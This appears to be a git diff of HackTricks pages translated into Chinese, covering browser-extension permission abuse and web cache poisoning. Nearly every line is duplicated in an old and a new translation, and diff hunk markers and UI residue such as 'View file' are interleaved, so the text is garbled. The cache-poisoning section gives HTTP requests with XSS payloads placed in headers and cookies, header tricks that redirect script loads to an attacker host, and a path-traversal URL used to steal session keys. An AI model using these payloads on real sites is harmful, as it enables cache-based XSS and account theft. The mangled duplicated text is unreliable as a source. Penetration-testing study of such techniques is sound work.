您可以在此处找到[**Chromium浏览器扩展可以请求的完整权限列表**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions),以及[**Firefox扩展的完整列表**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**。**
您可以在这里找到 [**Chromium 浏览器扩展可以请求的完整权限列表**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) 和 [**Firefox 扩展的完整列表在这里**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**.**
### `host_permissions`
可选但功能强大的设置**`host_permissions`**指示扩展将能够通过诸如[`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies)、[`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest)和[`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs)等API与哪些主机进行交互。
可选但强大的设置 **`host_permissions`** 指示扩展将能够通过 [`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies)、[`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest) [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) API 与哪些主机进行交互。
以下`host_permissions`基本上允许每个网络
以下 `host_permissions` 基本上允许每个网页
```json
"host_permissions": [
"*://*/*"
@ -49,90 +50,92 @@
"<all_urls>"
]
```
这些是浏览器扩展可以自由访问的主机。这是因为当浏览器扩展调用**`fetch("https://gmail.com/")`**时它不受CORS限制。
这些是浏览器扩展可以自由访问的主机。这是因为当浏览器扩展调用 **`fetch("https://gmail.com/")`** 时,它不受 CORS限制。
## 滥用`permissions`和`host_permissions`
## 滥用 `permissions` `host_permissions`
### 标签
### 标签
此外,**`host_permissions`**还解锁“高级”[**标签 API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs)**功能**。它们允许扩展调用[tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query),不仅可以获取用户浏览器标签的**列表**,还可以了解加载的**网页(即地址和标题)**。
此外,**`host_permissions`** 还解锁了“高级” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **功能。** 它们允许扩展调用 [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query),不仅可以获取 **用户的浏览器标签页列表**,还可以了解 **加载了哪个网页(即地址和标题)。**
{% hint style="danger" %}
不仅如此,像[tabs.onUpdated](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated)**这样的监听器也变得更加有用**。每当新页面加载到标签中时,它们将收到通知。
不仅如此,像 [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **这样的监听器也变得更加有用。** 每当新页面加载到标签页中时,它们将收到通知。
{% endhint %}
### 运行内容脚本 <a href="#running-content-scripts" id="running-content-scripts"></a>
内容脚本不一定静态地写入扩展清单中。在具有足够的**`host_permissions`**的情况下,扩展还可以通过调用[tabs.executeScript()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript)**或**[scripting.executeScript()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript)**动态加载它们。**
内容脚本不一定是静态写入扩展清单中的。只要有足够的 **`host_permissions`****扩展也可以通过调用** [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **或** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript) **动态加载它们。**
这两个 API 允许执行不仅包含在扩展中的文件作为内容脚本,还允许执行**任意代码**。前者允许将 JavaScript 代码作为字符串传递,而后者期望一个 JavaScript 函数,这样更不容易受到注入漏洞的影响。然而,如果被滥用,这两个 API 都会造成严重破坏
这两个 API 允许执行不仅仅是包含在扩展中的文件作为内容脚本,还可以执行 **任意代码**。前者允许将 JavaScript 代码作为字符串传入,而后者期望一个 JavaScript 函数,这样更不容易受到注入漏洞的影响。不过,如果滥用,这两个 API 都会造成严重后果
{% hint style="danger" %}
除了上述功能,内容脚本还可以例如拦截**凭据**,因为这些凭据是输入到网页中的。滥用它们的另一个经典方式是在每个网站上**注入广告**。添加**欺诈信息**以滥用新闻网站的信誉也是可能的。最后,它们可以**操纵**银行网站以重新路由资金转账
除了上述功能,内容脚本还可以例如 **拦截凭据**,当这些凭据输入到网页时。滥用它们的另一种经典方式是在每个网站上 **注入广告**。添加 **诈骗信息** 以滥用新闻网站的可信度也是可能的。最后,它们可以 **操纵银行** 网站以重新路由资金转移
{% endhint %}
### 隐式权限 <a href="#implicit-privileges" id="implicit-privileges"></a>
一些扩展权限**无需明确声明**。一个例子是[tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs):它的基本功能可以在没有任何权限的情况下访问。任何扩展都可以在您打开和关闭标签时收到通知,只是它不会知道这些标签对应的是哪个网站。
某些扩展权限 **不必明确声明**。一个例子是 [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs):其基本功能在没有任何权限的情况下也可以访问。任何扩展都可以在您打开和关闭标签时收到通知,只是它不会知道这些标签对应哪个网站。
听起来太无害了[tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create)则稍微不同。它可用于**创建一个新标签**,基本上与[window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open)相同,任何网站都可以调用它。然而,`window.open()`受到**弹出窗口拦截器的限制,而`tabs.create()`则没有**
听起来太无害了?[tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create) 就不那么无害了。它可以用来 **创建一个新标签页**,本质上与任何网站都可以调用的 [window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open) 相同。然而,虽然 `window.open()`**弹出窗口拦截器** 的限制,但 `tabs.create()` 不受此限制
{% hint style="danger" %}
扩展可以随时创建任意数量的标签
扩展可以在任何时候创建任意数量的标签页
{% endhint %}
如果您查看可能的`tabs.create()`参数,您还会注意到它的功能远远超出了`window.open()`被允许控制的范围。而且,虽然 Firefox 不允许使用`data:` URI 与此 API 一起使用,但 Chrome 没有这种保护。**在顶级使用这些 URI 已经**[**因被用于钓鱼而被禁止**](https://bugzilla.mozilla.org/show_bug.cgi?id=1331351)**。**
如果您查看可能的 `tabs.create()` 参数,您还会注意到它的功能远远超出了 `window.open()` 被允许控制的范围。虽然 Firefox 不允许在此 API 中使用 `data:` URI但 Chrome 没有这样的保护。**在顶层使用此类 URI 已被** [**禁止,因为它们被滥用于网络钓鱼**](https://bugzilla.mozilla.org/show\_bug.cgi?id=1331351)**。**
[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update)与`tabs.create()`非常相似,但会**修改现有标签**。因此,恶意扩展可以任意地将广告页面加载到您的标签中,并且还可以激活相应的标签
[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update)`tabs.create()` 非常相似,但会 **修改现有标签页**。因此,恶意扩展可以例如任意加载一个广告页面到您的标签页中,并且它还可以激活相应的标签页
### 摄像头、地理位置和其他权限 <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
### 网络摄像头、地理位置等 <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
您可能知道网站可以请求特殊权限,例如访问您的摄像头(视频会议工具)或地理位置(地图)。这些功能具有被滥用的潜力,因此用户每次都必须确认他们仍然希望这样做。
您可能知道网站可以请求特殊权限,例如访问您的网络摄像头(视频会议工具)或地理位置(地图)。这具有相当大的滥用潜力,因此用户每次都必须确认他们仍然希望这样做。
{% hint style="danger" %}
但浏览器扩展不同。**如果浏览器扩展**[**想要访问您的摄像头或麦克风**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**,它只需请求一次权限**
浏览器扩展则不是这样。**如果浏览器扩展** [**想要访问您的网络摄像头或麦克风**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**,它只需请求一次权限**
{% endhint %}
通常,扩展会在安装后立即这样做。一旦接受了此提示,**摄像头访问随时都可能发生**,即使用户此时没有与扩展进行交互。是的,用户只有在扩展真正需要摄像头访问时才会接受此提示。但之后,他们必须相信扩展不会秘密记录任何内容。
通常,扩展会在安装后立即这样做。一旦接受此提示,**随时可以访问网络摄像头**,即使用户此时没有与扩展交互。是的,用户只有在扩展确实需要网络摄像头访问时才会接受此提示。但在那之后,他们必须信任扩展不会秘密录制任何内容。
有权访问[您的精确地理位置](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation)或[剪贴板内容](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API),明确授予权限是不必要的。**扩展只需将`geolocation`或`clipboard`添加到**[**清单的权限条目**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions)**中**。这些访问权限在安装扩展时隐含授予。因此,具有这些权限的恶意或受损扩展可以创建您的移动轨迹文件或监视您的剪贴板以复制密码,而您却察觉不到
访问 [您确切的地理位置](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) [剪贴板内容](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard\_API) 时,显式授予权限根本不是必要的。**扩展只需将 `geolocation``clipboard` 添加到其** [**清单的权限条目**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **中。** 这些访问权限在扩展安装时隐式授予。因此,具有这些权限的恶意或被攻陷的扩展可以在您未注意到的情况下创建您的移动档案或监控您剪贴板中的复制密码
**`history`**关键字添加到扩展清单的[权限条目](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions)中授予对[**历史 API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history)的**访问权限**。它允许一次性检索用户的整个浏览历史记录,而无需等待用户再次访问这些网站。
**`history`** 关键字添加到扩展清单的 [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) 中授予 **访问** [**history API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history)。它允许一次性检索用户的整个浏览历史,而无需等待用户再次访问这些网站。
**`bookmarks`** **权限**具有类似的滥用潜力,它允许通过[**书签 API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks)**读取所有书签**
**`bookmarks`** **权限** 具有类似的滥用潜力,它允许 **通过** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks) **读取所有书签**
### 存储权限 <a href="#the-storage-permission" id="the-storage-permission"></a>
扩展存储仅是一个键值集合,与任何网站都可以使用的[localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage)非常相似。因此,不应在此处存储敏感信息。
扩展存储仅仅是一个键值集合,非常类似于任何网站都可以使用的 [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage)。因此,不应在此处存储敏感信息。
然而,广告公司也可滥用此存储。
然而,广告公司也可滥用此存储。
### 更多权限
您可以在此处找到[**Chromium 浏览器扩展可以请求的完整权限列表**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions),以及[**Firefox 扩展的完整列表**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**。**
您可以在这里找到 [**Chromium 浏览器扩展可以请求的完整权限列表**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) 和 [**Firefox 扩展的完整列表**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**。**
## 预防 <a href="#why-not-restrict-extension-privileges" id="why-not-restrict-extension-privileges"></a>
Google 的开发者政策明确禁止扩展请求比其功能所需更多的权限,有效地减少了过度权限请求的可能性。一个扩展超越这一界限的例子涉及将其与浏览器本身一起分发,而不是通过附加组件商店。
谷歌开发者的政策明确禁止扩展请求超出其功能所需的权限,从而有效减轻过度权限请求的情况。一个浏览器扩展超越这一界限的例子是它与浏览器本身一起分发,而不是通过附加组件商店。
浏览器可以进一步限制扩展权限的滥用。例如Chrome 的[tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/)和[desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) API用于屏幕录制旨在最小化滥用。tabCapture API 只能通过直接用户交互(例如单击扩展图标)激活,而 desktopCapture 需要用户确认才能录制窗口,防止秘密录制活动。
浏览器还可以进一步遏制扩展权限的滥用。例如Chrome 的 [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) API用于屏幕录制旨在最小化滥用。tabCapture API 只能通过直接用户交互(例如点击扩展图标)激活,而 desktopCapture 需要用户确认要录制的窗口,从而防止秘密录制活动。
然而,加强安全措施通常会导致扩展的灵活性和用户友好性降低。[activeTab 权限](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab\_permission)说明了这种权衡。它旨在消除扩展需要跨整个互联网请求主机权限的必要性,允许扩展仅在用户明确激活时访问当前标签。这种模式对于需要用户发起操作的扩展非常有效,但对于需要自动或预防性操作的扩展来说效果不佳,从而损害了便利性和即时响应性。
## **参考资料**
然而,收紧安全措施往往会导致扩展的灵活性和用户友好性降低。[activeTab permission](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab\_permission) 就说明了这种权衡。它的引入消除了扩展请求整个互联网的主机权限的需要,允许扩展在用户明确激活时仅访问当前标签页。该模型对于需要用户主动操作的扩展有效,但对于需要自动或预先操作的扩展则显得不足,从而妨碍了便利性和即时响应。
## **参考文献**
* [https://palant.info/2022/08/17/impact-of-extension-privileges/](https://palant.info/2022/08/17/impact-of-extension-privileges/)
* [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,51 +1,52 @@
# 缓存毒化和缓存欺骗
# Cache Poisoning and Cache Deception
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
## 区别
## The difference
> **Web缓存毒和Web缓存欺骗有什么区别**
> **Web 缓存毒和 Web 缓存欺骗之间有什么区别?**
>
> * 在**Web缓存毒化**中,攻击者导致应用程序将一些恶意内容存储在缓存中,并且这些内容从缓存中提供给其他应用程序用户。
> * 在**Web缓存欺骗**中,攻击者导致应用程序将属于另一个用户的一些敏感内容存储在缓存中,然后攻击者从缓存中检索这些内容。
> * 在 **Web 缓存中毒**中,攻击者使应用程序在缓存中存储一些恶意内容,并且这些内容从缓存中提供给其他应用程序用户。
> * 在 **Web 缓存欺骗**中,攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
## 缓存毒化
## Cache Poisoning
缓存毒旨在操纵客户端缓存,以强制客户端加载意外的、部分的或受攻击者控制的资源。受影响页面的受欢迎程度决定了影响的程度,因为受污染的响应仅提供给在缓存污染期间访问页面的用户。
缓存毒旨在操纵客户端缓存,以强制客户端加载意外、部分或由攻击者控制的资源。影响的程度取决于受影响页面的受欢迎程度,因为被污染的响应仅在缓存污染期间提供给访问该页面的用户。
执行缓存毒攻击涉及几个步骤:
执行缓存毒攻击涉及几个步骤:
1. **识别无键输入**:这些是虽然不是请求缓存所必需的参数,但可以改变服务器返回的响应。识别这些输入至关重要,因为它们可以被利用来操纵缓存。
2. **利用无键输入**:在识别无键输入后,下一步涉及弄清如何滥用这些参数,以使服务器的响应以有利于攻击者的方式进行修改
3. **确保毒化响应被缓存**:最后一步是确保操纵的响应被存储在缓存中。这样,任何在缓存被毒化时访问受影响页面的用户都将收到受污染的响应。
1. **识别无键输入**:这些是参数,尽管不是缓存请求所必需的,但可以改变服务器返回的响应。识别这些输入至关重要,因为它们可以被利用来操纵缓存。
2. **利用无键输入**:在识别无键输入后,下一步是弄清楚如何滥用这些参数,以修改服务器的响应,从而使攻击者受益
3. **确保被污染的响应被缓存**:最后一步是确保被操纵的响应被存储在缓存中。这样,任何在缓存被污染时访问受影响页面的用户将收到被污染的响应。
### 发现检查HTTP头
### Discovery: Check HTTP headers
通常,当响应被**存储在缓存中**时,会有一个**指示的头部**,您可以在这篇文章中查看应该注意的头部:[**HTTP缓存头部**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
通常,当响应被 **存储在缓存中** 时,会有一个 **指示的头部**,您可以在此帖子中检查您应该关注哪些头部:[**HTTP 缓存头部**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
### 发现:缓存错误代码
### Discovery: Caching error codes&#x20;
如果您认为响应被存储在缓存中,可以尝试**发送带有错误头部的请求**,应该会收到**状态码400**的响应。然后尝试正常访问请求,如果**响应是400状态码**则表示存在漏洞甚至可以执行DoS攻击)。
如果您认为响应正在被存储在缓存中,您可以尝试 **发送带有错误头部的请求**,这应该会以 **状态码 400** 响应。然后尝试正常访问请求,如果 **响应是 400 状态码**,您就知道它是脆弱的(您甚至可以执行 DoS)。
您可以在以下位置找到更多选项:
@ -53,34 +54,34 @@
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
{% endcontent-ref %}
请注意,**有时这些类型的状态码不会被缓存**,因此此测试可能不可靠。
是,请注意 **有时这些状态码不会被缓存**,因此此测试可能不可靠。
### 发现:识别和评估无键输入
### Discovery: Identify and evaluate unkeyed inputs
您可以使用[**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943)来**暴力破解可能会改变页面响应的参数和头部**。例如,页面可能正在使用`X-Forwarded-For`头部指示客户端从那里加载脚本:
您可以使用 [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) 来 **暴力破解可能 **改变页面响应** 的参数和头部。例如,一个页面可能使用头部 `X-Forwarded-For`指示客户端从那里加载脚本:
```markup
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
```
### 引发后端服务器的有害响应
通过识别的参数/标头,检查它是如何被**清理**以及它是如何**反映**或影响来自标头的响应的。您可以以任何方式滥用它(执行 XSS 或加载由您控制的 JS 代码?执行 DoS...
识别参数/头部后,检查它是如何被**清洗**的,以及**在哪里**被**反映**或影响头部的响应。你能以任何方式滥用它吗执行XSS或加载你控制的JS代码执行DoS...
### 获取响应缓存
一旦您**确定**了可以滥用的**页面**,要使用的**参数**/**标头**以及如何**滥用**它,您需要将页面缓存。根据您尝试缓存的资源,这可能需要一些时间,您可能需要尝试几秒钟。\
响应中的头**`X-Cache`**可能非常有用,因为当请求未被缓存时,它可能具有值**`miss`**,而当它被缓存时,它可能具有值**`hit`**。\
头**`Cache-Control`**也很有趣,可以知道资源是否被缓存,下次资源将再次被缓存的时间是什么时候`Cache-Control: public, max-age=1800`\
另一个有趣的标头是**`Vary`**。此标头通常用于**指示其他标头**,即使它们通常是无键的,也被视为**缓存键**的一部分。因此,如果用户知道受害者的 `User-Agent`,他可以为使用该特定 `User-Agent` 的用户毒害缓存。\
与缓存相关的另一个头是**`Age`**。它定义了对象在代理缓存中存在的秒数
一旦你**识别**了可以被滥用的**页面**,使用哪个**参数**/**头部**以及**如何**滥用它,你需要让页面被缓存。根据你尝试缓存的资源,这可能需要一些时间,你可能需要尝试几秒钟。\
响应中的头**`X-Cache`**可能非常有用,因为当请求未被缓存时,它的值可能是**`miss`**,而当被缓存时,它的值是**`hit`**。\
**`Cache-Control`**也很有趣,可以知道资源是否被缓存,以及下次资源将何时再次被缓存:`Cache-Control: public, max-age=1800`\
另一个有趣的头部是**`Vary`**。这个头部通常用于**指示额外的头部**,这些头部被视为**缓存键的一部分**,即使它们通常没有键。因此,如果用户知道他所针对的受害者的`User-Agent`,他可以为使用该特定`User-Agent`的用户毒化缓存。\
与缓存相关的另一个头是**`Age`**。它定义了对象在代理缓存中存在的时间(以秒为单位)
在缓存请求时,要**小心使用标头**,因为其中一些可能会**意外使用**为**键**,受害者将需要使用相同的标头。始终使用**不同的浏览器**测试缓存投毒以检查是否有效。
在缓存请求时,要**小心使用的头部**,因为其中一些可能会被**意外使用**为**键**,而**受害者需要使用相同的头部**。始终使用**不同的浏览器**测试缓存中毒,以检查其是否有效。
## 利用示例
### 最简单的示例
`X-Forwarded-For` 这样的标头在响应中未经清理地反映出来。\
您可以发送基本的 XSS 负载并毒害缓存,因此每个访问该页面的人都将受到 XSS 攻击:
`X-Forwarded-For`这样的头部在响应中未经过清洗地被反映。\
你可以发送一个基本的XSS有效负载并毒化缓存这样每个访问该页面的人都会受到XSS攻击:
```markup
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
@ -88,36 +89,38 @@ X-Forwarded-Host: a."><script>alert(1)</script>"
```
_Note that this will poison a request to `/en?region=uk` not to `/en`_
### 缓存投毒导致拒绝服务攻击
### Cache poisoning to DoS
{% content-ref url="cache-poisoning-to-dos.md" %}
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
{% endcontent-ref %}
### 利用网络缓存投毒来利用cookie处理漏洞
### 使用网络缓存中毒来利用 cookie 处理漏洞
Cookie也可能反映在页面的响应中。如果您可以滥用它来引发跨站脚本攻击,您可能能够利用恶意缓存响应中加载的多个客户端中的跨站脚本攻击
Cookies 也可能在页面的响应中被反射。如果你能利用它造成 XSS例如你可能能够在加载恶意缓存响应的多个客户端中利用 XSS
```markup
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
```
### 利用路径遍历进行缓存污染以窃取 API 密钥 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
注意,如果易受攻击的 cookie 被用户频繁使用,常规请求将清除缓存。
[**这篇文章解释了**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) 如何通过类似 `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` 的 URL 来窃取 OpenAI API 密钥,因为任何匹配 `/share/*` 的内容都会被缓存,而 Cloudflare 在请求到达 Web 服务器时并未对 URL 进行规范化。
### 利用路径遍历进行缓存中毒以窃取 API 密钥 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### 利用多个标头来利用 Web 缓存污染漏洞 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
[**这篇文章解释了**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) 如何通过一个像 `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` 的 URL 窃取 OpenAI API 密钥,因为任何匹配 `/share/*` 的内容都会被缓存,而 Cloudflare 不会对 URL 进行规范化,这在请求到达 web 服务器时完成。
有时,您需要**利用多个未加密的输入**来滥用缓存。例如,如果您将 `X-Forwarded-Host` 设置为您控制的域,并将 `X-Forwarded-Scheme` 设置为 `http`**如果**服务器将所有**HTTP**请求**转发到 HTTPS**,并使用标头 `X-Forwarded-Scheme` 作为重定向的域名。您可以通过重定向控制页面指向的位置。
### 利用多个头部来利用 web 缓存中毒漏洞 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
有时你需要 **利用多个未键入的输入** 来滥用缓存。例如,如果你将 `X-Forwarded-Host` 设置为你控制的域名,并将 `X-Forwarded-Scheme` 设置为 `http`,你可能会发现一个 **开放重定向**。**如果** 服务器 **将所有的 HTTP 请求转发到 HTTPS** 并使用头部 `X-Forwarded-Scheme` 作为重定向的域名,你可以控制重定向指向的页面。
```markup
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
X-Forwarded-Scheme: http
```
### 利用有限的 `Vary`
### 利用有限的 `Vary`
如果你发现 **`X-Host`** 头部被用作**域名来加载一个JS资源**,但响应中的 **`Vary`** 头部指示了 **`User-Agent`**。那么,你需要找到一种方法来窃取受害者的 User-Agent并使用该用户代理程序来操纵缓存:
